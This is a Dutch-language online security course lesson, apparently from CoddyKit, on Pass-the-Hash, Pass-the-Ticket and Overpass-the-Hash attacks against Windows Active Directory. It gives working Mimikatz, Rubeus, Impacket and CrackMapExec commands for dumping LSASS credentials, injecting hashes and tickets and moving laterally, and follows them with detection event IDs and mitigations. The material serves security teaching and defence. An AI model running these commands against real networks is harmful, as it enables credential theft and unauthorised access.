Cyber Security Academy · Les

Pass-the-Hash- en Pass-the-Ticket-aanvallen

Gebruik credential hashes en Kerberos-tickets om lateraal te bewegen zonder platte wachtwoorden te kennen.

Les 2 van 413 stappen

Pass-the-Hash- en Pass-the-Ticket-aanvallen is een gratis Cyber Security Academy-les op CoddyKit. Dit is les 2 van 4. Je kunt 3 lessen uit dit leerpad gratis volledig lezen — daarna ontgrendelt CoddyKit PRO alle lessen, plus praktische oefeningen met een ingebouwde code-editor en een AI-tutor die 24/7 beschikbaar is. Deze les maakt deel uit van het leertraject Cyber Security Academy. Je voortgang wordt gesynchroniseerd op het web en in de CoddyKit-app. De cursus Cyber Security Academy bevat in totaal 4 lessen.

Waarom deze aanvallen bestaan

Windows-protocollen voor aanmeldgegevens slaan geheimen voor authenticatie (NTLM-hashes en Kerberostickets) op in het geheugen. Een aanvaller met SYSTEM-rechten kan deze geheimen extraheren en opnieuw gebruiken om zich als andere gebruikers te authenticeren zonder hun wachtwoorden te kennen.

NTLM-hashes extraheren met Mimikatz

Mimikatz is het belangrijkste hulpmiddel voor het extraheren van aanmeldgegevens in Windows. Wanneer het wordt uitgevoerd als SYSTEM of Administrator, leest het het procesgeheugen van LSASS om NTLM-hashes en inloggegevens in leesbare tekst te extraheren.

# Run mimikatz as Admin:
mimikatz.exe

# Enable debug privilege
privilege::debug

# Dump LSASS credentials
sekurlsa::logonpasswords

# Dump local SAM hashes
lsadump::sam

Pass-the-Hash (PtH) met Mimikatz

PtH injecteert een NTLM-hash in een nieuwe sessie zonder het wachtwoord in leesbare tekst te kennen. De hash authenticeert bij externe services met NTLM en is effectief voor laterale verplaatsing naar andere Windows-hosts.

# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
  /ntlm:aad3b435b51404eeaad3b435b51404ee \
  /run:cmd.exe

# Opens cmd.exe authenticated as that user

Pass-the-Hash met Impacket

Impacket levert Python-hulpmiddelen voor PtH: psexec.py, smbexec.py en wmiexec.py accepteren NTLM-hashes rechtstreeks voor het op afstand uitvoeren van opdrachten.

# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
  -hashes aad3b435...:8846f7eaee8fb117...

# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
  -hashes :8846f7eaee8fb117ad06bdd830b7586c

Kerberostickets extraheren

Kerberostickets worden ook opgeslagen in het geheugen van LSASS. Mimikatz extraheert ze; Rubeus is het gespecialiseerde hulpmiddel voor bewerkingen met Kerberostickets in Windows.

# Mimikatz: export all tickets
sekurlsa::tickets /export

# Rubeus: list tickets
Rubeus.exe triage

# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgt

Pass-the-Ticket (PtT)

PtT injecteert een gestolen Kerberosticket in de huidige sessie. Het ticket authenticeert bij services als de oorspronkelijke eigenaar van het ticket — er zijn geen hash of wachtwoord nodig.

# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi

# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi

# Verify injection
klist

LSASS op afstand uitlezen

Gebruik vanaf een voet aan de grond CrackMapExec of secretsdump van Impacket om LSASS op afstand uit te lezen — een interactieve sessie op het doelwit is niet nodig.

# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa

# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100

Paden voor laterale verplaatsing

Nadat je hashes of tickets hebt verkregen, verplaats je je lateraal: gebruik PtH op andere machines waar lokale beheerdersaccounts zijn hergebruikt, gebruik PtT voor toegang tot domeinservices en verhoog je rechten richting domeinbeheerder door accounts met verhoogde rechten als doelwit te nemen.

PtH en PtT detecteren

Beveiligers detecteren PtH via: Event ID 4624 (aanmelding) met aanmeldingstype 3 en zonder bijbehorende interactieve aanmelding, afwijkingen in NTLM-authenticatie en kenmerken van Mimikatz in het geheugen of op schijf.

# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential use

Beveiligingsmaatregelen

Belangrijke maatregelen zijn: schakel Credential Guard in (dit beschermt LSASS met virtualisatie), beperk hergebruik van lokale beheerdersaccounts tussen machines met LAPS, verplicht de groep Protected Users voor accounts met verhoogde rechten en schakel NTLM uit waar mogelijk.

Overpass-the-Hash

Overpass-the-Hash zet een NTLM-hash om in een Kerberos-TGT. Dit is nuttig in omgevingen waarin NTLM wordt geblokkeerd maar Kerberos beschikbaar is, of wanneer je een TGT nodig hebt voor verdere Kerberosaanvallen.

# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
  /ntlm:8846f7eaee8fb117ad06bdd830b7586c \
  /run:powershell.exe

# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...

Korte controle

Welke Windows-beveiligingsfunctie beschermt de opslag van LSASS-inloggegevens met behulp van virtualisatie?

Samenvatting: PtH en PtT

Pass-the-Hash en Pass-the-Ticket vormen de basis van laterale verplaatsing binnen Active Directory. Beide maken misbruik van het opslaan van Windows-inloggegevens in LSASS. Mimikatz en Impacket maken het extraheren en hergebruiken ervan eenvoudig. Bescherm je omgeving met Credential Guard, LAPS, de groep Protected Users en strikte bewaking van NTLM- en Kerberos-authenticatiegebeurtenissen.

Gratis beginnen

Leer Cyber Security Academy met een AI-tutor — gratis

Schrijf echte code en voer die uit in je browser, krijg direct hulp van een AI-tutor die 24/7 beschikbaar is en ga verder waar je gebleven bent op het web of in de app.

Cursussen
76
Lessen
303

Veelgestelde vragen

Is de les “Pass-the-Hash- en Pass-the-Ticket-aanvallen” gratis?

Ja — je kunt hier op het web alle 3 lessen van het leerpad Cyber Security Academy, waaronder “Pass-the-Hash- en Pass-the-Ticket-aanvallen”, gratis volledig lezen. Daarna ontgrendelt CoddyKit PRO alle lessen, plus interactieve oefeningen met een ingebouwde code-editor en een AI-tutor die 24/7 beschikbaar is. De cursus Cyber Security Academy bevat in totaal 4 lessen.

Wat leer ik in “Pass-the-Hash- en Pass-the-Ticket-aanvallen”?

Gebruik credential hashes en Kerberos-tickets om lateraal te bewegen zonder platte wachtwoorden te kennen. Je oefent met Cyber Security Academy door code rechtstreeks in de browser uit te voeren. Een AI-begeleider die 24/7 beschikbaar is beantwoordt je vragen terwijl je de les doorwerkt.

Heb ik ervaring nodig om met Cyber Security Academy te beginnen?

Ervaring vooraf is niet nodig. Cyber Security Academy op CoddyKit is opgebouwd voor beginners tot gevorderden, zodat je hier of bij het begin kunt starten en in je eigen tempo kunt leren. Dit is les 2 van 4.

Hoe lang duurt de les “Pass-the-Hash- en Pass-the-Ticket-aanvallen”?

De meeste lessen van CoddyKit duren ongeveer 5–10 minuten. Elke les is kort en interactief, zodat je gestaag vooruitgaat en op het web en in de app precies verdergaat waar je was gebleven.

Kan ik code schrijven en uitvoeren in deze les over Cyber Security Academy?

Ja. Elke les over Cyber Security Academy bevat een ingebouwde code-editor, zodat je rechtstreeks in je browser echte code kunt schrijven en uitvoeren en direct feedback van AI krijgt — lokale installatie is niet nodig.

Alle lessen in deze cursus

  1. Windows-authenticatie: NTLM en Kerberos
  2. Pass-the-Hash- en Pass-the-Ticket-aanvallen
  3. Kerberoasting en AS-REP-roasting
  4. Active Directory beveiligen
← Terug naar Cyber Security Academy